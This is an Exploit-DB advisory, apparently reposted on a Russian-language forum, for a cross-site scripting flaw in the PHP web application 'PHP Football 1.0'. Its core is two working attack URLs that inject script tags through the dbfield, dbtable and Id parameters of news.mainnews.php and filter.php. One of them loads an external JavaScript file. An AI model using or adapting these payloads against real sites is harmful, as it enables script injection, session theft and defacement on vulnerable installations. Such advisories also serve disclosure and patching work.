- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10720
- Проверка EDB
-
- Пройдено
- Автор
- INDOUSHKA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-12-26
Код:
========================================================================================
| # Title : PHP Football Version : 1.0 Cross Site Scripting Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # Web Site : www.iq-ty.com |
| # Script : PHP Football Version : 1.0 http://www.nextdesign.eu.org/ |
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu) |
| # Bug : XSS |
====================== Exploit By indoushka =================================
| # Exploit :
|
| 1- http://127.0.0.1:80/PHPfootball/scripts/news.mainnews.php?dbfield=Content&dbtable=News&Id=1<ScRiPt+src=http://127.0.0.1/xss.js?213771818860></ScRiPt>
| 2- http://127.0.0.1/PHPfootball/scripts/filter.php?dbtable=Games&dbfield=1%00"'><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&style=normal
|
================================ Dz-Ghost Team ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------- Источник
- www.exploit-db.com
